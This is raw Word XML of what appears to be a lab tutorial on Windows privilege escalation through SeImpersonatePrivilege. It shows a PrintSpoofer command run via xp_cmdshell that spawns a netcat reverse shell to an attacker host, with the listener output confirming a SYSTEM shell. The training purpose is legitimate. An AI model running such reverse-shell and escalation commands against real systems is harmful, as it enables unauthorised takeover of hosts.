          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument to execute a command. Here, using </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to spawn a reverse shell (with a Netcat listener waiting on our attack box on port 8443).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D28AF73" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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Escalating Privileges using PrintSpoofer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF8DB7"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SQL&gt; xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C957F"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0101842"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output                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F5DC3"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53CEE1C"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">--------------------------------------------------------------------------------   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D879425"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54B1F76"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 Found privilege: SeImpersonatePrivilege                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02F1C5"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201EECE"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 Named pipe listening...                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F331F51"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7452F08"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 CreateProcessAsUser() OK                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A201E"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F1F136A"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 xml:space="preserve">NULL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36388E5E" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Catching Reverse Shell as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA8337"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If all goes according to plan, we will have a SYSTEM shell on our netcat listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3848B15E" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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Catching Reverse Shell as SYSTEM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C93B90"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yovecio@htb[/htb]$ nc -lnvp 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFEEA0A"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7655C99"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listening on [any] 8443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269E20B1"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connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 49847</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B58E83E"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Microsoft Windows [Version 10.0.14393]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD24001"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(c) 2016 Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EE4A04"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89A6BA0"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71F8960"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C:\Windows\system32&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE6272E"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B79DA91"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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC2B1C2" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nt authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A4B73" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalating privileges by leveraging </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeImpersonate</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is very common. It is essential to be familiar with the various methods available to us depending on the target host OS version and level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E0482" w14:textId="77777777" w:rsidR="00213442" w:rsidRPr="00291DE9" w:rsidRDefault="00213442">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="00291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53"/>
    <w:rsid w:val="001F7C53"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00291DE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C2C3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{71311649-7243-4492-A2EE-BFA7207C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1D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291DE9"/>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291DE9"/>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DE9"/>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291DE9"/>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291DE9"/>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291DE9"/>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291DE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91DE9"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00291DE9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0029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291DE9"/>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291DE9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00291DE9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00291DE9"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mb-0">
    <w:name w:val="mb-0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00291DE9"/>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968459">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="914630479">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="481771899">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="20533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4587">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="309483793">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2367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8241">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2040813357">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1281037552">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="31728981">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="661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3262">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1755852913">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="14359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572">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2071223022">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="12897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577">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="364214203">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="20663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6956">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="485436802">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="4982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309">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1589263911">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="9149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troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/antonioCoco/RoguePotato" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoofe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microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ohpe/juicy-potato" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itm4n.github.io/printspoofer-abusing-impersonate-privile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1679</Words>
  <Characters>9575</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>79</Lines>
  <Paragraphs>22</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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2023-08-03T13:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-03T13:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>